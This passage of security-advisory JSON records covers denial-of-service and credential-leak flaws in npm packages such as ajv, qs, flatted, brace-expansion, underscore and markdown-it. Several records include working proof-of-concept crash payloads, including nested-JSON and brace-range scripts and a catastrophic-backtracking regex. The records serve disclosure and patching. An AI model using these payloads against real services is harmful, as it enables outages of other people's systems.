              "introduced": "0"
            },
            {
              "fixed": "6.14.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-69873"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333",
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-17T16:38:57Z",
    "nvd_published_at": "2026-02-11T19:15:50Z",
    "severity": "MODERATE"
  },
  "details": "ajv (Another JSON Schema Validator) through version 8.17.1 is vulnerable to Regular Expression Denial of Service (ReDoS) when the `$data` option is enabled. The pattern keyword accepts runtime data via JSON Pointer syntax (`$data` reference), which is passed directly to the JavaScript `RegExp()` constructor without validation. An attacker can inject a malicious regex pattern (e.g., `\\\"^(a|a)*$\\\"`) combined with crafted input to cause catastrophic backtracking. A 31-character payload causes approximately 44 seconds of CPU blocking, with each additional character doubling execution time. This enables complete denial of service with a single HTTP request against any API using ajv with `$data`: true for dynamic schema validation.",
  "id": "GHSA-2g4f-4pwh-qvx6",
  "modified": "2026-03-02T21:58:39Z",
  "published": "2026-02-11T21:30:39Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ajv-validator/ajv/pull/2586"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ajv-validator/ajv/pull/2588"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ajv-validator/ajv/pull/2590"
    },
    {
      "type": "WEB",
      "url": "https://github.com/github/advisory-database/pull/6991"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ajv-validator/ajv/commit/720a23fa453ffae8340e92c9b0fe886c54cfe0d5"
    },
    {
      "type": "WEB",
      "url": "https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69873-ajv-ReDoS.md"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-2g4f-4pwh-qvx6"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ajv-validator/ajv"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ajv-validator/ajv/releases/tag/v6.14.0"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ajv-validator/ajv/releases/tag/v8.18.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "ajv has ReDoS when using `$data` option"
}

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "renovate"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "42.68.1"
            },
            {
              "fixed": "42.96.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "renovate"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "43.0.0"
            },
            {
              "fixed": "43.4.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-269"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-13T20:53:58Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "When Renovate spawns child processes, their access to environment variables is filtered to an allowlist, to prevent unauthorized access to privileged credentials that the Renovate process has access to.\n\nSince [42.68.1](https://github.com/renovatebot/renovate/releases/tag/42.68.1) (2025-12-30), this filtering had been **inadvertently removed**, and so any child processes spawned from these versions will have had access to any environment variables that Renovate has access to.\n\nThis could lead to [insider attackers](https://docs.renovatebot.com/security-and-permissions/#execution-of-code-insider-attack) and [outside attackers](https://docs.renovatebot.com/security-and-permissions/#execution-of-code-outsider-attack) being able to exflitrate secrets from the Renovate deployment.\n\nIt is recommended to rotate (+ revoke) any credentials that Renovate has access to, in case any spawned child processes have attempted to exfiltrate any secrets.\n\n## Impact\n\nChild processes spawned by Renovate (i.e. `npm install`, anything defined in [`postUpgradeTasks`](https://docs.renovatebot.com/configuration-options/#postupgradetasks) or [`postUpdateOptions`](https://docs.renovatebot.com/configuration-options/#postupdateoptions)) will have full access to the environment variables that the Renovate process has. \n\nThis could lead to [insider attackers](https://docs.renovatebot.com/security-and-permissions/#execution-of-code-insider-attack) and [outside attackers](https://docs.renovatebot.com/security-and-permissions/#execution-of-code-outsider-attack) being able to exflitrate secrets from the Renovate deployment.\n\n## Patches\n\nThis is patched in [42.96.3](https://github.com/renovatebot/renovate/releases/tag/42.96.3) and [43.4.4](https://github.com/renovatebot/renovate/releases/tag/43.4.4).\n\n## Workarounds\n\nThere are no workarounds, other than upgrading your Renovate version.\n\n## Why did this happen?\n\nAs part of work towards https://github.com/renovatebot/renovate/security/advisories/GHSA-pfq2-hh62-7m96, one of the [preparatory changes](https://github.com/renovatebot/renovate/pull/40212) we made was moving to [`execa`](https://www.npmjs.com/package/execa).\n\nOne of the default behaviours of `execa` is to [extend the process\u0027 environment variables with any new ones](https://github.com/sindresorhus/execa/tree/v8.0.1?tab=readme-ov-file#extendenv), rather than override them.\n\nThis was missed in code review, which meant that since this version, the full environment variables have been provided to any child processes spawned with `execa` by Renovate.\n\nThis was discovered as part of an unrelated change.",
  "id": "GHSA-8wc6-vgrq-x6cf",
  "modified": "2026-02-13T20:53:58Z",
  "published": "2026-02-13T20:53:58Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/renovatebot/renovate/security/advisories/GHSA-8wc6-vgrq-x6cf"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/renovatebot/renovate"
    },
    {
      "type": "WEB",
      "url": "https://github.com/renovatebot/renovate/releases/tag/42.96.3"
    },
    {
      "type": "WEB",
      "url": "https://github.com/renovatebot/renovate/releases/tag/43.4.4"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Child processes spawned by Renovate incorrectly have full access to environment variables"
}

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 6.14.1"
      },
      "package": {
        "ecosystem": "npm",
        "name": "qs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.7.0"
            },
            {
              "fixed": "6.14.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-2391"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-12T17:04:39Z",
    "nvd_published_at": "2026-02-12T05:17:11Z",
    "severity": "LOW"
  },
  "details": "### Summary\nThe `arrayLimit` option in qs does not enforce limits for comma-separated values when `comma: true` is enabled, allowing attackers to cause denial-of-service via memory exhaustion. This is a bypass of the array limit enforcement, similar to the bracket notation bypass addressed in GHSA-6rw7-vpxm-498p (CVE-2025-15284).\n\n### Details\nWhen the `comma` option is set to `true` (not the default, but configurable in applications), qs allows parsing comma-separated strings as arrays (e.g., `?param=a,b,c` becomes `[\u0027a\u0027, \u0027b\u0027, \u0027c\u0027]`). However, the limit check for `arrayLimit` (default: 20) and the optional throwOnLimitExceeded occur after the comma-handling logic in `parseArrayValue`, enabling a bypass. This permits creation of arbitrarily large arrays from a single parameter, leading to excessive memory allocation.\n\n**Vulnerable code** (lib/parse.js: lines ~40-50):\n```js\nif (val \u0026\u0026 typeof val === \u0027string\u0027 \u0026\u0026 options.comma \u0026\u0026 val.indexOf(\u0027,\u0027) \u003e -1) {\n    return val.split(\u0027,\u0027);\n}\n\nif (options.throwOnLimitExceeded \u0026\u0026 currentArrayLength \u003e= options.arrayLimit) {\n    throw new RangeError(\u0027Array limit exceeded. Only \u0027 + options.arrayLimit + \u0027 element\u0027 + (options.arrayLimit === 1 ? \u0027\u0027 : \u0027s\u0027) + \u0027 allowed in an array.\u0027);\n}\n\nreturn val;\n```\nThe `split(\u0027,\u0027)` returns the array immediately, skipping the subsequent limit check. Downstream merging via `utils.combine` does not prevent allocation, even if it marks overflows for sparse arrays.This discrepancy allows attackers to send a single parameter with millions of commas (e.g., `?param=,,,,,,,,...`), allocating massive arrays in memory without triggering limits. It bypasses the intent of `arrayLimit`, which is enforced correctly for indexed (`a[0]=`) and bracket (`a[]=`) notations (the latter fixed in v6.14.1 per GHSA-6rw7-vpxm-498p).\n\n### PoC\n**Test 1 - Basic bypass:**\n```\nnpm install qs\n```\n\n```js\nconst qs = require(\u0027qs\u0027);\n\nconst payload = \u0027a=\u0027 + \u0027,\u0027.repeat(25);  // 26 elements after split (bypasses arrayLimit: 5)\nconst options = { comma: true, arrayLimit: 5, throwOnLimitExceeded: true };\n\ntry {\n  const result = qs.parse(payload, options);\n  console.log(result.a.length);  // Outputs: 26 (bypass successful)\n} catch (e) {\n  console.log(\u0027Limit enforced:\u0027, e.message);  // Not thrown\n}\n```\n**Configuration:**\n- `comma: true`\n- `arrayLimit: 5`\n- `throwOnLimitExceeded: true`\n\nExpected: Throws \"Array limit exceeded\" error.\nActual: Parses successfully, creating an array of length 26.\n\n\n### Impact\nDenial of Service (DoS) via memory exhaustion.\n\n### Suggested Fix\nMove the `arrayLimit` check before the comma split in `parseArrayValue`, and enforce it on the resulting array length. Use `currentArrayLength` (already calculated upstream) for consistency with bracket notation fixes.\n\n**Current code** (lib/parse.js: lines ~40-50):\n```js\nif (val \u0026\u0026 typeof val === \u0027string\u0027 \u0026\u0026 options.comma \u0026\u0026 val.indexOf(\u0027,\u0027) \u003e -1) {\n    return val.split(\u0027,\u0027);\n}\n\nif (options.throwOnLimitExceeded \u0026\u0026 currentArrayLength \u003e= options.arrayLimit) {\n    throw new RangeError(\u0027Array limit exceeded. Only \u0027 + options.arrayLimit + \u0027 element\u0027 + (options.arrayLimit === 1 ? \u0027\u0027 : \u0027s\u0027) + \u0027 allowed in an array.\u0027);\n}\n\nreturn val;\n```\n\n**Fixed code:**\n```js\nif (val \u0026\u0026 typeof val === \u0027string\u0027 \u0026\u0026 options.comma \u0026\u0026 val.indexOf(\u0027,\u0027) \u003e -1) {\n    const splitArray = val.split(\u0027,\u0027);\n    if (splitArray.length \u003e options.arrayLimit - currentArrayLength) {  // Check against remaining limit\n        if (options.throwOnLimitExceeded) {\n            throw new RangeError(\u0027Array limit exceeded. Only \u0027 + options.arrayLimit + \u0027 element\u0027 + (options.arrayLimit === 1 ? \u0027\u0027 : \u0027s\u0027) + \u0027 allowed in an array.\u0027);\n        } else {\n            // Optionally convert to object or truncate, per README\n            return splitArray.slice(0, options.arrayLimit - currentArrayLength);\n        }\n    }\n    return splitArray;\n}\n\nif (options.throwOnLimitExceeded \u0026\u0026 currentArrayLength \u003e= options.arrayLimit) {\n    throw new RangeError(\u0027Array limit exceeded. Only \u0027 + options.arrayLimit + \u0027 element\u0027 + (options.arrayLimit === 1 ? \u0027\u0027 : \u0027s\u0027) + \u0027 allowed in an array.\u0027);\n}\n\nreturn val;\n```\nThis aligns behavior with indexed and bracket notations, reuses `currentArrayLength`, and respects `throwOnLimitExceeded`. Update README to note the consistent enforcement.",
  "id": "GHSA-w7fw-mjwx-w883",
  "modified": "2026-02-12T20:07:59Z",
  "published": "2026-02-12T17:04:39Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/ljharb/qs/security/advisories/GHSA-w7fw-mjwx-w883"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2391"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ljharb/qs/commit/f6a7abff1f13d644db9b05fe4f2c98ada6bf8482"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ljharb/qs"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "qs\u0027s arrayLimit bypass in comma parsing allows denial of service"
}

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "flatted"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.4.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-32141"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-674"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-13T15:40:42Z",
    "nvd_published_at": "2026-03-12T18:16:25Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nflatted\u0027s `parse()` function uses a recursive `revive()` phase to resolve circular references in deserialized JSON. When given a crafted payload with deeply nested or self-referential `$` indices, the recursion depth is unbounded, causing a stack overflow that crashes the Node.js process.\n\n## Impact\n\nDenial of Service (DoS). Any application that passes untrusted input to `flatted.parse()` can be crashed by an unauthenticated attacker with a single request.\n\nflatted has ~87M weekly npm downloads and is used as the circular-JSON serialization layer in many caching and logging libraries.\n\n## Proof of Concept\n\n```javascript\nconst flatted = require(\u0027flatted\u0027);\n\n// Build deeply nested circular reference chain\nconst depth = 20000;\nconst arr = new Array(depth + 1);\narr[0] = \u0027{\"a\":\"1\"}\u0027;\nfor (let i = 1; i \u003c= depth; i++) {\n  arr[i] = `{\"a\":\"${i + 1}\"}`;\n}\narr[depth] = \u0027{\"a\":\"leaf\"}\u0027;\n\nconst payload = JSON.stringify(arr);\nflatted.parse(payload); // RangeError: Maximum call stack size exceeded\n```\n\n## Fix\n\nThe maintainer has already merged an iterative (non-recursive) implementation in PR #88, converting the recursive `revive()` to a stack-based loop.\n\n## Affected Versions\n\nAll versions prior to the PR #88 fix.",
  "id": "GHSA-25h7-pfq9-p65f",
  "modified": "2026-03-13T15:40:42Z",
  "published": "2026-03-13T15:40:42Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WebReflection/flatted/security/advisories/GHSA-25h7-pfq9-p65f"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32141"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WebReflection/flatted/pull/88"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WebReflection/flatted/commit/7eb65d857e1a40de11c47461cdbc8541449f0606"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WebReflection/flatted"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "flatted vulnerable to unbounded recursion DoS in parse() revive phase"
}

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.0.0"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@isaacs/brace-expansion"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.0.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25547"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-03T19:41:15Z",
    "nvd_published_at": "2026-02-04T22:16:00Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\n`@isaacs/brace-expansion` is vulnerable to a Denial of Service (DoS) issue caused by unbounded brace range expansion. When an attacker provides a pattern containing repeated numeric brace ranges, the library attempts to eagerly generate every possible combination synchronously. Because the expansion grows exponentially, even a small input can consume excessive CPU and memory and may crash the Node.js process.\n\n### Details\n\nThe vulnerability occurs because `@isaacs/brace-expansion` expands brace expressions without any upper bound or complexity limit. Expansion is performed eagerly and synchronously, meaning the full result set is generated before returning control to the caller.\n\nFor example, the following input:\n\n```\n{0..99}{0..99}{0..99}{0..99}{0..99}\n```\n\nproduces:\n\n```\n100^5 = 10,000,000,000 combinations\n```\n\nThis exponential growth can quickly overwhelm the event loop and heap memory, resulting in process termination.\n\n### Proof of Concept\n\nThe following script reliably triggers the issue.\n\nCreate `poc.js`:\n\n```js\nconst { expand } = require(\u0027@isaacs/brace-expansion\u0027);\n\nconst pattern = \u0027{0..99}{0..99}{0..99}{0..99}{0..99}\u0027;\n\nconsole.log(\u0027Starting expansion...\u0027);\nexpand(pattern);\n```\n\nRun it:\n\n```bash\nnode poc.js\n```\n\nThe process will freeze and typically crash with an error such as:\n\n```\nFATAL ERROR: JavaScript heap out of memory\n```\n\n### Impact\n\nThis is a denial of service vulnerability. Any application or downstream dependency that uses `@isaacs/brace-expansion` on untrusted input may be vulnerable to a single-request crash.\n\nAn attacker does not require authentication and can use a very small payload to:\n\n* Trigger exponential computation\n* Exhaust memory and CPU resources\n* Block the event loop\n* Crash Node.js services relying on this library",
  "id": "GHSA-7h2j-956f-4vf2",
  "modified": "2026-02-05T00:36:54Z",
  "published": "2026-02-03T19:41:15Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/isaacs/brace-expansion/security/advisories/GHSA-7h2j-956f-4vf2"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25547"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/isaacs/brace-expansion"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "@isaacs/brace-expansion has Uncontrolled Resource Consumption"
}

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "fast-xml-parser"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "5.3.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "fast-xml-parser"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0-beta.0"
            },
            {
              "fixed": "4.5.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-27942"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-120"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-26T22:33:10Z",
    "nvd_published_at": "2026-02-26T02:16:22Z",
    "severity": "LOW"
  },
  "details": "### Impact\nApplication crashes with stack overflow when user use XML builder with `prserveOrder:true` for following or similar input \n\n```\n[{\n    \u0027foo\u0027: [\n        { \u0027bar\u0027: [{ \u0027@_V\u0027: \u0027baz\u0027 }] }\n    ]\n}]\n```\n\nCause: `arrToStr` was not validating if the input is an array or a string and treating all non-array values as text content.\n_What kind of vulnerability is it? Who is impacted?_\n\n### Patches\nYes in 5.3.8\n\n### Workarounds\nUse XML builder with `preserveOrder:false` or check the input data before passing to builder.\n\n### References\n[_Are there any links users can visit to find out more?_](https://github.com/NaturalIntelligence/fast-xml-parser/pull/791)",
  "id": "GHSA-fj3w-jwp8-x2g3",
  "modified": "2026-03-06T22:00:11Z",
  "published": "2026-02-26T22:33:10Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-fj3w-jwp8-x2g3"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27942"
    },
    {
      "type": "WEB",
      "url": "https://github.com/NaturalIntelligence/fast-xml-parser/pull/791"
    },
    {
      "type": "WEB",
      "url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/c13a961910f14986295dd28484eee830fa1a0e8a"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/NaturalIntelligence/fast-xml-parser"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U",
      "type": "CVSS_V4"
    }
  ],
  "summary": "fast-xml-parser has stack overflow in XMLBuilder with preserveOrder"
}

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.13.7"
      },
      "package": {
        "ecosystem": "npm",
        "name": "underscore"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.13.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-27601"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-674",
      "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-03T17:46:06Z",
    "nvd_published_at": "2026-03-03T23:15:55Z",
    "severity": "HIGH"
  },
  "details": "### Impact\n\nIn simple words, some programs that use `_.flatten` or `_.isEqual` could be made to crash. Someone who wants to do harm may be able to do this on purpose. This can only be done if the program has special properties. It only works in Underscore versions up to 1.13.7. A more detailed explanation follows.\n\nIn affected versions of Underscore, the `_.flatten` and `_.isEqual` functions use recursion without a depth limit. Under very specific conditions, detailed below, an attacker could exploit this in a Denial of Service (DoS) attack by triggering a stack overflow.\n\nA proof of concept (PoC) for this type of attack with `_.isEqual`:\n\n```js\nconst _ = require(\u0027underscore\u0027);\n\n// build JSON string for nested object ~4500 levels deep\n// (for this to be an attack, the JSON would have to come from\n// a request or other untrusted input)\nlet json = \u0027\u0027;\nfor (let i = 0; i \u003c 4500; i++) json += \u0027{\"n\":\u0027;\njson += \u0027\"x\"\u0027;\nfor (let i = 0; i \u003c 4500; i++) json += \u0027}\u0027;\n\n// construct two distinct objects with equal shape from the above JSON\nconst a = JSON.parse(json);\nconst b = JSON.parse(json);\n\n_.isEqual(a, b); // RangeError: Maximum call stack size exceeded\n```\n\nA proof of concept (PoC) for this type of attack with `_.flatten`:\n\n```js\nconst _ = require(\u0027underscore\u0027);\n\n// build nested array ~4500 levels deep\n// (like with _.isEqual, this nested array would have to be sourced\n// from an untrusted external source for it to be an attack)\nlet nested = [];\nfor (let i = 0; i \u003c 4500; i++) nested = [nested];\n\n_.flatten(nested); // RangeError: Maximum call stack size exceeded\n```\n\nAn application that crashes because of this can be restarted, so the bug is most relevant to applications for which continued operation is important, such as server applications. Furthermore, an application is only vulnerable to this type of attack if ALL of the following conditions are met:\n\n- Untrusted input must be used to create a recursive datastructure, for example using `JSON.parse`, with no enforced depth limit.\n- The datastructure thus created must be passed to `_.flatten` or `_.isEqual`.\n- In the case of `_.flatten`, the vulnerability can only be exploited if it is possible for a remote client to prepare a datastructure that consists of arrays at all levels AND if no finite depth limit is passed as the second argument to `_.flatten`.\n- In the case of `_.isEqual`, the vulnerability can only be exploited if there exists a code path in which two distinct datastructures that were submitted by the same remote client are compared using `_.isEqual`. For example, if a client submits data that are stored in a database, and the same client can later submit another datastructure that is then compared to the data that were saved in the database previously, OR if a client submits a single request, but its data are parsed twice, creating two non-identical but equivalent datastructures that are then compared.\n- Exceptions originating from the call to `_.flatten` or `_.isEqual`, as a result of a stack overflow, are not being caught.\n\nAll versions of Underscore up to and including 1.13.7 are affected by this weakness.\n\n### Patches\n\nThe problem has been patched in version 1.13.8. Upgrading to 1.13.8 or later completely prevents exploitation.\n\n**Note:** historically, there have been breaking changes in minor releases of Underscore, especially between versions 1.6 and 1.9. However, upgrading from version 1.9 or later to any later 1.x version should be feasible with little or no effort for all users.\n\n### Workarounds\n\nA workaround that works for both functions is to enforce a depth limit on the datastructure that is created from untrusted input. A limit of 1000 levels should prevent attacks from being successful on most systems. In systems with highly constrained hardware, we recommend lower limits, for example 100 levels.\n\nAnother possible workaround that only works for `_.flatten`, is to pass a second argument that limits the flattening depth to 1000 or less.\n\n### References\n\n- https://github.com/jashkenas/underscore/issues/3011\n- https://underscorejs.org/#1.13.8\n- https://underscorejs.org/#flatten\n- https://underscorejs.org/#isEqual",
  "id": "GHSA-qpx9-hpmf-5gmw",
  "modified": "2026-03-04T02:00:05Z",
  "published": "2026-03-03T17:46:06Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/jashkenas/underscore/security/advisories/GHSA-qpx9-hpmf-5gmw"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27601"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jashkenas/underscore/issues/3011"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jashkenas/underscore/commit/411e222eb0ca5d570cc4f6315c02c05b830ed2b4"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jashkenas/underscore/commit/a6e23ae9647461ec33ad9f92a2ecfc220eea0a84"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/jashkenas/underscore"
    },
    {
      "type": "WEB",
      "url": "https://underscorejs.org/#1.13.8"
    },
    {
      "type": "WEB",
      "url": "https://underscorejs.org/#flatten"
    },
    {
      "type": "WEB",
      "url": "https://underscorejs.org/#isEqual"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Underscore has unlimited recursion in _.flatten and _.isEqual, potential for DoS attack"
}

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-2327",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-12T14:41:31.205349Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-12T14:41:53.714Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://security.snyk.io/vuln/SNYK-JS-MARKDOWNIT-10666750"
          },
          {
            "tags": [
              "exploit"
            ],
            "url": "https://gist.github.com/ltduc147/c9abecae1b291ede4f692f2ab988c917"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "markdown-it",
          "vendor": "n/a",
          "versions": [
            {
              "lessThan": "14.1.1",
              "status": "affected",
              "version": "13.0.0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Duc Le Trung"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Versions of the package markdown-it from 13.0.0 and before 14.1.1 are vulnerable to Regular Expression Denial of Service (ReDoS) due to the use of the regex /\\*+$/ in the linkify function. An attacker can supply a long sequence of * characters followed by a non-matching character, which triggers excessive backtracking and may lead to a denial-of-service condition."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "exploitCodeMaturity": "PROOF_OF_CONCEPT",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P",
            "version": "3.1"
          },
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 6.9,
            "baseSeverity": "MEDIUM",
            "exploitMaturity": "PROOF_OF_CONCEPT",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P",
            "version": "4.0",
            "vulnAvailabilityImpact": "LOW",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-1333",
              "description": "Regular Expression Denial of Service (ReDoS)",
              "lang": "en"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-12T05:00:07.369Z",
        "orgId": "bae035ff-b466-4ff4-94d0-fc9efd9e1730",
        "shortName": "snyk"
      },
      "references": [
        {
          "url": "https://security.snyk.io/vuln/SNYK-JS-MARKDOWNIT-10666750"
        },
        {
          "url": "https://gist.github.com/ltduc147/c9abecae1b291ede4f692f2ab988c917"
        },
        {
          "url": "https://github.com/markdown-it/markdown-it/blob/14.1.0/lib/rules_inline/linkify.mjs%23L33"
        },
        {
          "url": "https://github.com/markdown-it/markdown-it/commit/4b4bbcae5e0990a5b172378e507b33a59012ed26"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "bae035ff-b466-4ff4-94d0-fc9efd9e1730",
    "assignerShortName": "snyk",
    "cveId": "CVE-2026-2327",
    "datePublished": "2026-02-12T05:00:07.369Z",
    "dateReserved": "2026-02-11T07:02:27.771Z",
    "dateUpdated": "2026-02-12T14:41:53.714Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-25547",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-05T14:24:50.676205Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
